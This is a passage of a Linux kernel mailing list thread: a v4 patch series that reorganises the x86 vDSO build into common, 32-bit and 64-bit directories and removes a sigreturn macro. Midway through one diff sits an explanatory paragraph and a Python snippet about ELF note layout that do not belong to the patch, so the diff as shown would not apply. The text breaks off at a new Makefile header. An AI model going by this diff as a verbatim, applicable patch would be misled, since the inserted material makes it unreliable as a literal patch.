arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
A macro SYSCALL_ENTER_KERNEL was defined in sigreturn.S, with the
ability of overriding it. The override capability, however, is not
used anywhere, and the macro name is potentially confusing because it
seems to imply that sysenter/syscall could be used here, which is NOT
true: the sigreturn system calls MUST use int $0x80.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vdso32/sigreturn.S | 8 ++------
1 file changed, 2 insertions(+), 6 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/sigreturn.S b/arch/x86/entry/vdso/vdso32/sigreturn.S
index 1bd068f72d4c..965900c6763b 100644
--- a/arch/x86/entry/vdso/vdso32/sigreturn.S
+++ b/arch/x86/entry/vdso/vdso32/sigreturn.S
@@ -3,10 +3,6 @@
#include <asm/unistd_32.h>
#include <asm/asm-offsets.h>
-#ifndef SYSCALL_ENTER_KERNEL
-#define SYSCALL_ENTER_KERNEL int $0x80
-#endif
-
.text
.globl __kernel_sigreturn
.type __kernel_sigreturn,@function
@@ -16,7 +12,7 @@ __kernel_sigreturn:
.LSTART_sigreturn:
popl %eax /* XXX does this mean it needs unwind info? */
movl $__NR_sigreturn, %eax
- SYSCALL_ENTER_KERNEL
+ int $0x80
.LEND_sigreturn:
SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
nop
@@ -28,7 +24,7 @@ SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
__kernel_rt_sigreturn:
.LSTART_rt_sigreturn:
movl $__NR_rt_sigreturn, %eax
- SYSCALL_ENTER_KERNEL
+ int $0x80
.LEND_rt_sigreturn:
SYM_INNER_LABEL(vdso32_rt_sigreturn_landing_pad, SYM_L_GLOBAL)
nop
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:38 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation in vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
  - remove stray comment from prototyping (Uros Bizjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
    currently unused. (Uros Bizjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
- Separate out the vdso sources into common, vdso32, and vdso64
directories.
- Build the 32- and 64-bit vdsos in their respective subdirectories;
this greatly simplifies the build flags handling.
- Unify the mangling of Makefile flags between the 32- and 64-bit
vdso code as much as possible; all common rules are put in
  arch/x86/entry/vdso/common/Makefile.include. The remaining Makefile
is very simple for 32 bits; the 64-bit one is only slightly more
complicated because it contains the x32 generation rule.
- Define __DISABLE_EXPORTS when building the vdso. This need seems to
  have been masked by a different ordering of the compile flags before.
- Change CONFIG_X86_64 to BUILD_VDSO32_64 in vdso32/system_call.S,
to make it compatible with including fake_32bit_build.h.
- The -fcf-protection= option was "leaking" from the kernel build,
  for reasons that were not clear to me. Furthermore, several
distributions ship with it set to a default value other than
"-fcf-protection=none". Make it match the configuration options
for *user space*.
Note that this patch may seem large, but the vast majority of it is
simply code movement.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/Makefile | 161 +-----------------
arch/x86/entry/vdso/common/Makefile.include | 89 ++++++++++
.../entry/vdso/{vdso-note.S => common/note.S} | 5 +-
.../entry/vdso/{ => common}/vclock_gettime.c | 0
.../entry/vdso/{ => common}/vdso-layout.lds.S | 0
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/system_call.S | 2 +-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 +++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
.../x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
21 files changed, 180 insertions(+), 186 deletions(-)
create mode 100644 arch/x86/entry/vdso/common/Makefile.include
rename arch/x86/entry/vdso/{vdso-note.S => common/note.S} (62%)
rename arch/x86/entry/vdso/{ => common}/vclock_gettime.c (100%)
rename arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S (100%)
rename arch/x86/entry/vdso/{ => common}/vgetcpu.c (100%)
create mode 100644 arch/x86/entry/vdso/vdso32/Makefile
create mode 100644 arch/x86/entry/vdso/vdso64/Makefile
create mode 100644 arch/x86/entry/vdso/vdso64/note.S
create mode 100644 arch/x86/entry/vdso/vdso64/vclock_gettime.c
rename arch/x86/entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} (94%)
rename arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S (92%)
create mode 100644 arch/x86/entry/vdso/vdso64/vgetcpu.c
rename arch/x86/entry/vdso/{ => vdso64}/vgetrandom-chacha.S (100%)
rename arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c (91%)
rename arch/x86/entry/vdso/{ => vdso64}/vsgx.S (100%)
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index 3d9b09f00c70..987b43fd4cd3 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -3,159 +3,10 @@
# Building vDSO images for x86.
#
-# Include the generic Makefile to check the built vDSO:
-include $(srctree)/lib/vdso/Makefile.include
+# Regular kernel objects
+obj-y := vma.o extable.o
+obj-$(CONFIG_COMPAT_32) += vdso32-setup.o
-# Files to link into the vDSO:
-vobjs-y := vdso-note.o vclock_gettime.o vgetcpu.o vgetrandom.o vgetrandom-chacha.o
-vobjs32-y := vdso32/note.o vdso32/system_call.o vdso32/sigreturn.o
-vobjs32-y += vdso32/vclock_gettime.o vdso32/vgetcpu.o
-vobjs-$(CONFIG_X86_SGX) += vsgx.o
-
-# Files to link into the kernel:
-obj-y += vma.o extable.o
-
-# vDSO images to build:
-obj-$(CONFIG_X86_64) += vdso64-image.o
-obj-$(CONFIG_X86_X32_ABI) += vdsox32-image.o
-obj-$(CONFIG_COMPAT_32) += vdso32-image.o vdso32-setup.o
-
-vobjs := $(addprefix $(obj)/, $(vobjs-y))
-vobjs32 := $(addprefix $(obj)/, $(vobjs32-y))
-
-$(obj)/vdso.o: $(obj)/vdso.so
-
-targets += vdso.lds $(vobjs-y)
-targets += vdso32/vdso32.lds $(vobjs32-y)
-
-targets += $(foreach x, 64 x32 32, vdso-image-$(x).c vdso$(x).so vdso$(x).so.dbg)
-
-CPPFLAGS_vdso.lds += -P -C
-
-VDSO_LDFLAGS_vdso.lds = -m elf_x86_64 -soname linux-vdso.so.1 \
- -z max-page-size=4096
-
-$(obj)/vdso64.so.dbg: $(obj)/vdso.lds $(vobjs) FORCE
- $(call if_changed,vdso_and_check)
-
-VDSO2C = $(objtree)/arch/x86/tools/vdso2c
-
-quiet_cmd_vdso2c = VDSO2C $@
- cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
-
-$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(VDSO2C) FORCE
- $(call if_changed,vdso2c)
-
-#
-# Don't omit frame pointers for ease of userspace debugging, but do
-# optimize sibling calls.
-#
-CFL := $(PROFILING) -mcmodel=small -fPIC -O2 -fasynchronous-unwind-tables -m64 \
- $(filter -g%,$(KBUILD_CFLAGS)) -fno-stack-protector \
- -fno-omit-frame-pointer -foptimize-sibling-calls \
- -DDISABLE_BRANCH_PROFILING -DBUILD_VDSO
-
-ifdef CONFIG_MITIGATION_RETPOLINE
-ifneq ($(RETPOLINE_VDSO_CFLAGS),)
- CFL += $(RETPOLINE_VDSO_CFLAGS)
-endif
-endif
-
-$(vobjs): KBUILD_CFLAGS := $(filter-out $(PADDING_CFLAGS) $(CC_FLAGS_LTO) $(CC_FLAGS_CFI) $(RANDSTRUCT_CFLAGS) $(KSTACK_ERASE_CFLAGS) $(GCC_PLUGINS_CFLAGS) $(RETPOLINE_CFLAGS),$(KBUILD_CFLAGS)) $(CFL)
-$(vobjs): KBUILD_AFLAGS += -DBUILD_VDSO
-
-#
-# vDSO code runs in userspace and -pg doesn't help with profiling anyway.
-#
-CFLAGS_REMOVE_vclock_gettime.o = -pg
-CFLAGS_REMOVE_vdso32/vclock_gettime.o = -pg
-CFLAGS_REMOVE_vgetcpu.o = -pg
-CFLAGS_REMOVE_vdso32/vgetcpu.o = -pg
-CFLAGS_REMOVE_vsgx.o = -pg
-CFLAGS_REMOVE_vgetrandom.o = -pg
-
-#
-# X32 processes use x32 vDSO to access 64bit kernel data.
-#
-# Build x32 vDSO image:
-# 1. Compile x32 vDSO as 64bit.
-# 2. Convert object files to x32.
-# 3. Build x32 VDSO image with x32 objects, which contains 64bit codes
-# so that it can reach 64bit address space with 64bit pointers.
-#
-
-CPPFLAGS_vdsox32.lds = $(CPPFLAGS_vdso.lds)
-VDSO_LDFLAGS_vdsox32.lds = -m elf32_x86_64 -soname linux-vdso.so.1 \
- -z max-page-size=4096
-
-# x32-rebranded versions
-vobjx32s-y := $(vobjs-y:.o=-x32.o)
-
-# same thing, but in the output directory
-vobjx32s := $(addprefix $(obj)/, $(vobjx32s-y))
-
-# Convert 64bit object file to x32 for x32 vDSO.
-quiet_cmd_x32 = X32 $@
- cmd_x32 = $(OBJCOPY) -O elf32-x86-64 $< $@
-
-$(obj)/%-x32.o: $(obj)/%.o FORCE
- $(call if_changed,x32)
-
-targets += vdsox32.lds $(vobjx32s-y)
-
-$(obj)/%.so: OBJCOPYFLAGS := -S --remove-section __ex_table
-$(obj)/%.so: $(obj)/%.so.dbg FORCE
- $(call if_changed,objcopy)
-
-$(obj)/vdsox32.so.dbg: $(obj)/vdsox32.lds $(vobjx32s) FORCE
- $(call if_changed,vdso_and_check)
-
-CPPFLAGS_vdso32/vdso32.lds = $(CPPFLAGS_vdso.lds)
-VDSO_LDFLAGS_vdso32.lds = -m elf_i386 -soname linux-gate.so.1
-
-KBUILD_AFLAGS_32 := $(filter-out -m64,$(KBUILD_AFLAGS)) -DBUILD_VDSO
-$(obj)/vdso32.so.dbg: KBUILD_AFLAGS = $(KBUILD_AFLAGS_32)
-$(obj)/vdso32.so.dbg: asflags-$(CONFIG_X86_64) += -m32
-
-KBUILD_CFLAGS_32 := $(filter-out -m64,$(KBUILD_CFLAGS))
-KBUILD_CFLAGS_32 := $(filter-out -mcmodel=kernel,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out -fno-pic,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out -mfentry,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(RANDSTRUCT_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(KSTACK_ERASE_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(GCC_PLUGINS_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(RETPOLINE_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(CC_FLAGS_LTO),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(CC_FLAGS_CFI),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(PADDING_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 += -m32 -msoft-float -mregparm=0 -fpic
-KBUILD_CFLAGS_32 += -fno-stack-protector
-KBUILD_CFLAGS_32 += $(call cc-option, -foptimize-sibling-calls)
-KBUILD_CFLAGS_32 += -fno-omit-frame-pointer
-KBUILD_CFLAGS_32 += -DDISABLE_BRANCH_PROFILING
-KBUILD_CFLAGS_32 += -DBUILD_VDSO
-
-ifdef CONFIG_MITIGATION_RETPOLINE
-ifneq ($(RETPOLINE_VDSO_CFLAGS),)
- KBUILD_CFLAGS_32 += $(RETPOLINE_VDSO_CFLAGS)
-endif
-endif
-
-$(obj)/vdso32.so.dbg: KBUILD_CFLAGS = $(KBUILD_CFLAGS_32)
-
-$(obj)/vdso32.so.dbg: $(obj)/vdso32/vdso32.lds $(vobjs32) FORCE
- $(call if_changed,vdso_and_check)
-
-#
-# The DSO images are built using a special linker script.
-#
-quiet_cmd_vdso = VDSO $@
- cmd_vdso = $(LD) -o $@ \
- $(VDSO_LDFLAGS) $(VDSO_LDFLAGS_$(filter %.lds,$(^F))) \
- -T $(filter %.lds,$^) $(filter %.o,$^)
-
-VDSO_LDFLAGS = -shared --hash-style=both --build-id=sha1 --no-undefined \
- $(call ld-option, --eh-frame-hdr) -Bsymbolic -z noexecstack
-
-quiet_cmd_vdso_and_check = VDSO $@
- cmd_vdso_and_check = $(cmd_vdso); $(cmd_vdso_check)
+# vDSO directories
+obj-$(CONFIG_X86_64) += vdso64/
+obj-$(CONFIG_COMPAT_32) += vdso32/
diff --git a/arch/x86/entry/vdso/common/Makefile.include b/arch/x86/entry/vdso/common/Makefile.include
new file mode 100644
index 000000000000..3514b4a6869b
--- /dev/null
+++ b/arch/x86/entry/vdso/common/Makefile.include
@@ -0,0 +1,89 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# Building vDSO images for x86.
+#
+
+# Include the generic Makefile to check the built vDSO:
+include $(srctree)/lib/vdso/Makefile.include
+
+obj-y += $(foreach x,$(vdsos-y),vdso$(x)-image.o)
+
+targets += $(foreach x,$(vdsos-y),vdso$(x)-image.c vdso$(x).so vdso$(x).so.dbg vdso$(x).lds)
+targets += $(vobjs-y)
+
+# vobjs-y with $(obj)/ prepended
+vobjs := $(addprefix $(obj)/,$(vobjs-y))
+
+# Options for vdso*.lds
+CPPFLAGS_VDSO_LDS := -P -C -I$(src)/..
+$(obj)/%.lds : KBUILD_CPPFLAGS += $(CPPFLAGS_VDSO_LDS)
+
+#
+# Options from KBUILD_[AC]FLAGS that should *NOT* be kept
+#
+flags-remove-y += \
+ -D__KERNEL__ -mcmodel=kernel -mregparm=3 \
+	-fno-pic -fno-PIC -fno-pie -fno-PIE \
+ -mfentry -pg \
+	$(RANDSTRUCT_CFLAGS) $(GCC_PLUGINS_CFLAGS) $(KSTACK_ERASE_CFLAGS) \
+ $(RETPOLINE_CFLAGS) $(CC_FLAGS_LTO) $(CC_FLAGS_CFI) \
+ $(PADDING_CFLAGS)
+
+#
+# Don't omit frame pointers for ease of userspace debugging, but do
+# optimize sibling calls.
+#
+flags-y += -D__DISABLE_EXPORTS
+flags-y += -DDISABLE_BRANCH_PROFILING
+flags-y += -DBUILD_VDSO
+flags-y += -I$(src)/.. -I$(srctree)
+flags-y += -O2 -fpic
+flags-y += -fno-stack-protector
+flags-y += -fno-omit-frame-pointer
+flags-y += -foptimize-sibling-calls
+flags-y += -fasynchronous-unwind-tables
+
+# Reset cf protections enabled by compiler default
+flags-y += $(call cc-option, -fcf-protection=none)
+flags-$(CONFIG_X86_USER_SHADOW_STACK) += $(call cc-option, -fcf-protection=return)
+# When user space IBT is supported, enable this.
+# flags-$(CONFIG_USER_IBT) += $(call cc-option, -fcf-protection=branch)
+
+flags-$(CONFIG_MITIGATION_RETPOLINE) += $(RETPOLINE_VDSO_CFLAGS)
+
+# These need to be conditional on $(vobjs) as they do not apply to
+# the output vdso*-image.o files which are standard kernel objects.
+$(vobjs) : KBUILD_AFLAGS := \
+ $(filter-out $(flags-remove-y),$(KBUILD_AFLAGS)) $(flags-y)
+$(vobjs) : KBUILD_CFLAGS := \
+ $(filter-out $(flags-remove-y),$(KBUILD_CFLAGS)) $(flags-y)
+
+#
+# The VDSO images are built using a special linker script.
+#
+VDSO_LDFLAGS := -shared --hash-style=both --build-id=sha1 --no-undefined \
+ $(call ld-option, --eh-frame-hdr) -Bsymbolic -z noexecstack
+
+quiet_cmd_vdso = VDSO $@
+ cmd_vdso = $(LD) -o $@ \
+ $(VDSO_LDFLAGS) $(VDSO_LDFLAGS_$*) \
+ -T $(filter %.lds,$^) $(filter %.o,$^)
+quiet_cmd_vdso_and_check = VDSO $@
+ cmd_vdso_and_check = $(cmd_vdso); $(cmd_vdso_check)
+
+$(obj)/vdso%.so.dbg: $(obj)/vdso%.lds FORCE
+ $(call if_changed,vdso_and_check)
+
+$(obj)/%.so: OBJCOPYFLAGS := -S --remove-section __ex_table
+$(obj)/%.so: $(obj)/%.so.dbg FORCE
+ $(call if_changed,objcopy)
+
+VDSO2C = $(objtree)/arch/x86/tools/vdso2c
+
+quiet_cmd_vdso2c = VDSO2C $@
+ cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
+
+$(obj)/%-image.c: $(obj)/%.so.dbg $(obj)/%.so $(VDSO2C) FORCE
+ $(call if_changed,vdso2c)
+
+$(obj)/%-image.o: $(obj)/%-image.c
diff --git a/arch/x86/entry/vdso/vdso-note.S b/arch/x86/entry/vdso/common/note.S
similarity index 62%
rename from arch/x86/entry/vdso/vdso-note.S
rename to arch/x86/entry/vdso/common/note.S
index 79423170118f..2cbd39939dc6 100644
--- a/arch/x86/entry/vdso/vdso-note.S
+++ b/arch/x86/entry/vdso/common/note.S
@@ -1,13 +1,16 @@
+/* SPDX-License-Identifier: GPL-2.0 */
/*
* This supplies .note.* sections to go into the PT_NOTE inside the vDSO text.
* Here we can supply some information useful to userland.
*/
#include <linux/build-salt.h>
-#include <linux/uts.h>
#include <linux/version.h>
#include <linux/elfnote.h>
+/* Ideally this would use UTS_NAME, but using a quoted string here
+ doesn't work. Remember to change this when changing the
+ kernel's name. */
ELFNOTE_START(Linux, 0, "a")
.long LINUX_VERSION_CODE
ELFNOTE_END
diff --git a/arch/x86/entry/vdso/vclock_gettime.c b/arch/x86/entry/vdso/common/vclock_gettime.c
similarity index 100%
rename from arch/x86/entry/vdso/vclock_gettime.c
rename to arch/x86/entry/vdso/common/vclock_gettime.c
diff --git a/arch/x86/entry/vdso/vdso-layout.lds.S b/arch/x86/entry/vdso/common/vdso-layout.lds.S
similarity index 100%
rename from arch/x86/entry/vdso/vdso-layout.lds.S
rename to arch/x86/entry/vdso/common/vdso-layout.lds.S
diff --git a/arch/x86/entry/vdso/vgetcpu.c b/arch/x86/entry/vdso/common/vgetcpu.c
similarity index 100%
rename from arch/x86/entry/vdso/vgetcpu.c
rename to arch/x86/entry/vdso/common/vgetcpu.c
diff --git a/arch/x86/entry/vdso/vdso32/Makefile b/arch/x86/entry/vdso/vdso32/Makefile
new file mode 100644
index 000000000000..add6afb484ba
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso32/Makefile
@@ -0,0 +1,24 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# 32-bit vDSO images for x86.
+#
+
+# The vDSOs built in this directory
+vdsos-y := 32
+
+# Files to link into the vDSO:
+vobjs-y := note.o vclock_gettime.o vgetcpu.o
+vobjs-y += system_call.o sigreturn.o
+
+# Compilation flags
+flags-y := -DBUILD_VDSO32 -m32 -mregparm=0
+flags-$(CONFIG_X86_64) += -include $(src)/fake_32bit_build.h
+flags-remove-y := -m64
+
+# The location of this include matters!
+include $(src)/../common/Makefile.include
+
+# Linker options for the vdso
+VDSO_LDFLAGS_32 := -m elf_i386 -soname linux-gate.so.1
+
+$(obj)/vdso32.so.dbg: $(vobjs)
diff --git a/arch/x86/entry/vdso/vdso32/note.S b/arch/x86/entry/vdso/vdso32/note.S
index 2cbd39939dc6..62d8aa51ce99 100644
--- a/arch/x86/entry/vdso/vdso32/note.S
+++ b/arch/x86/entry/vdso/vdso32/note.S
@@ -1,18 +1 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-/*
- * This supplies .note.* sections to go into the PT_NOTE inside the vDSO text.
- * Here we can supply some information useful to userland.
- */
-
-#include <linux/build-salt.h>
-#include <linux/version.h>
-#include <linux/elfnote.h>
-
-/* Ideally this would use UTS_NAME, but using a quoted string here
- doesn't work. Remember to change this when changing the
- kernel's name. */
-ELFNOTE_START(Linux, 0, "a")
- .long LINUX_VERSION_CODE
-ELFNOTE_END
-
-BUILD_SALT
+#include "common/note.S"
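For context on what the consolidated common/note.S emits: ELFNOTE_START/ELFNOTE_END produce a standard ELF note record, which is three 4-byte words (namesz, descsz, type) followed by the name and the descriptor, each padded to 4-byte alignment, with namesz counting the name's terminating NUL. A quick sketch of that layout for the "Linux"/type-0 note carrying a 4-byte version word (the version value here is a made-up example, not a real LINUX_VERSION_CODE):

```python
import struct

def elf_note(name: bytes, note_type: int, desc: bytes) -> bytes:
    """Pack an ELF note: namesz, descsz, type, then 4-byte-padded name and desc."""
    def pad4(b: bytes) -> bytes:
        return b + b"\0" * (-len(b) % 4)
    name_z = name + b"\0"                     # namesz includes the NUL terminator
    hdr = struct.pack("<III", len(name_z), len(desc), note_type)
    return hdr + pad4(name_z) + pad4(desc)

# The vDSO note: name "Linux", type 0, descriptor = a kernel version code
version_code = (6 << 16) | (19 << 8) | 0      # hypothetical 6.19.0
note = elf_note(b"Linux", 0, struct.pack("<I", version_code))
```

This is why debuggers can find build-id-style notes by walking PT_NOTE: every record is self-describing and 4-byte aligned.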
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index d33c6513fd2c..2a15634bbe75 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -52,7 +52,7 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
-#ifdef CONFIG_X86_64
+#ifdef BUILD_VDSO32_64
/* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSENTER32, \
SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
diff --git a/arch/x86/entry/vdso/vdso32/vclock_gettime.c b/arch/x86/entry/vdso/vdso32/vclock_gettime.c
index 86981decfea8..1481f0021b9f 100644
--- a/arch/x86/entry/vdso/vdso32/vclock_gettime.c
+++ b/arch/x86/entry/vdso/vdso32/vclock_gettime.c
@@ -1,4 +1 @@
-// SPDX-License-Identifier: GPL-2.0
-#define BUILD_VDSO32
-#include "fake_32bit_build.h"
-#include "../vclock_gettime.c"
+#include "common/vclock_gettime.c"
diff --git a/arch/x86/entry/vdso/vdso32/vdso32.lds.S b/arch/x86/entry/vdso/vdso32/vdso32.lds.S
index 8a3be07006bb..8a853543fc0d 100644
--- a/arch/x86/entry/vdso/vdso32/vdso32.lds.S
+++ b/arch/x86/entry/vdso/vdso32/vdso32.lds.S
@@ -11,7 +11,7 @@
#define BUILD_VDSO32
-#include "../vdso-layout.lds.S"
+#include "common/vdso-layout.lds.S"
/* The ELF entry point can be used to set the AT_SYSINFO value. */
ENTRY(__kernel_vsyscall);
diff --git a/arch/x86/entry/vdso/vdso32/vgetcpu.c b/arch/x86/entry/vdso/vdso32/vgetcpu.c
index 3a9791f5e998..00cc8325a020 100644
--- a/arch/x86/entry/vdso/vdso32/vgetcpu.c
+++ b/arch/x86/entry/vdso/vdso32/vgetcpu.c
@@ -1,3 +1 @@
-// SPDX-License-Identifier: GPL-2.0
-#include "fake_32bit_build.h"
-#include "../vgetcpu.c"
+#include "common/vgetcpu.c"
diff --git a/arch/x86/entry/vdso/vdso64/Makefile b/arch/x86/entry/vdso/vdso64/Makefile
new file mode 100644
index 000000000000..bfffaf1aeecc
--- /dev/null
